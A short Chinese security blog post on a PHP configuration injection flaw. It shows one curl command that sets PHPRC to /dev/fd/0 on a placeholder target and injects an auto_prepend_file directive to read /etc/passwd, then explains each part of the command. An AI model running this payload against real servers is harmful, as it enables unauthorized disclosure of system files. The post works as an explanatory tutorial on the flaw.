【网络安全】PHP配置注入漏洞

未经许可,不得转载。

文章目录

正文

前提:通过探测等方式发现某个 PHP 文件存在 PHPRC 参数:

bash 复制代码
curl "https://xxx.com/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

PHPRC 用于指定 PHP 配置文件(php.ini)的路径。通过将其设置为 /dev/fd/0,我们尝试让服务器从标准输入读取 PHP 配置。

--data-binary 参数以二进制格式发送数据,适合传递原始数据而非标准表单参数。

auto_prepend_file 是 PHP 配置选项,可以在执行脚本前自动包含指定文件。这里我们设置为 /etc/passwd,试图读取系统敏感信息。

漏洞证明如下:

相关推荐
小堃学编程2 小时前
计算机网络(七) —— https协议与网络安全证书
计算机网络·web安全·https
Flying_Fish_roe5 小时前
linux-网络管理-网络抓包
linux·网络·php
小羽网安9 小时前
2024有哪些值得关注,学习类的网络安全公众号?
安全·web安全
炫彩@之星9 小时前
攻防实战-nacos新洞如何反弹和注入内存马
web安全·安全测试·nacos新洞·内存马注入
Dovir多多9 小时前
渗透测试入门学习——php文件上传与文件包含
前端·后端·学习·安全·web安全·php
stark张宇11 小时前
lnmp - 登录技术方案设计与实现
php·jwt
Dovir多多12 小时前
渗透测试入门学习——php表单form与POST、GET请求练习
学习·安全·web安全·网络安全·系统安全·php·xss
桶将军T12 小时前
SEAFARING靶场渗透
数据库·web安全
喜欢猪猪13 小时前
TCP/IP网络编程概念及Java实现TCP/IP通讯Demo
开发语言·php